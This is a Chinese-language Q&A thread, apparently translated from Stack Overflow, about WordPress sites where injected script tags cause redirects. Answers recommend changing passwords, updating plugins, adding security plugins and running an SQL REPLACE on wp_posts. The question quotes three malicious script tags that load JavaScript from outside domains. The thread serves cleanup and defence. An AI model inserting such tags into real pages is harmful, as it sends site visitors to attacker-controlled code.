我在许多worpdress网站上都遇到了问题,在这些网站中嵌套了一些脚本以生成重定向。一些脚本可能如下:
<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'> </script>
<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>
<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>
我想知道是否存在已知漏洞以及解决此问题的方法。 Wordpress版本为4.9.8,这些站点具有不同的插件和不同的主题(均已更新),看来该漏洞并不取决于特定的插件或主题。谢谢。
答案 0 :(得分:0)
就我而言,我需要清理数据库。
受感染最严重的表格是:wp_posts
答案 1 :(得分:0)
第一步是将所有密码更改为服务器(cpanel,ftp,ect),Wordpress和数据库。 (在所有内容上都使用愚蠢的长硬密码!利用WordPress的密码生成器。)
第二个是获取WordPress的所有最新更新版本,您的插件和您的主题。
接下来,看看您是否安装了易受攻击的插件。如果是这样,请删除该插件。安装此插件:
https://wordpress.org/plugins/vulnerable-plugin-checker
请注意,全新安装并非总能奏效,实际上取决于黑客的类型。在许多情况下,文件会再次重新创建所有恶意文件。它甚至可以位于您的网站根文件夹的根目录之上!重新安装并执行其他步骤后,如果重新生成,则最好只是切换到新服务器或重新格式化服务器(如果您可以选择)。
我还将推荐一些用于增强安全性的插件。 https://wordpress.org/plugins/ninjafirewall
https://wordpress.org/plugins/better-wp-security(此处是强行使用,重命名目录)
答案 2 :(得分:0)
谢谢大家。我在不同的站点中解决了我的问题,这些站点在wp_post表的post_content字段中进行搜索,然后替换包含脚本的字段部分。
UPDATE nameDB.wp_posts
SET post_content = REPLACE (post_content, "<script src = 'urlscript' type = 'text / javascript'> </ script>", "")
最后,我更新了所有插件和核心(如果需要)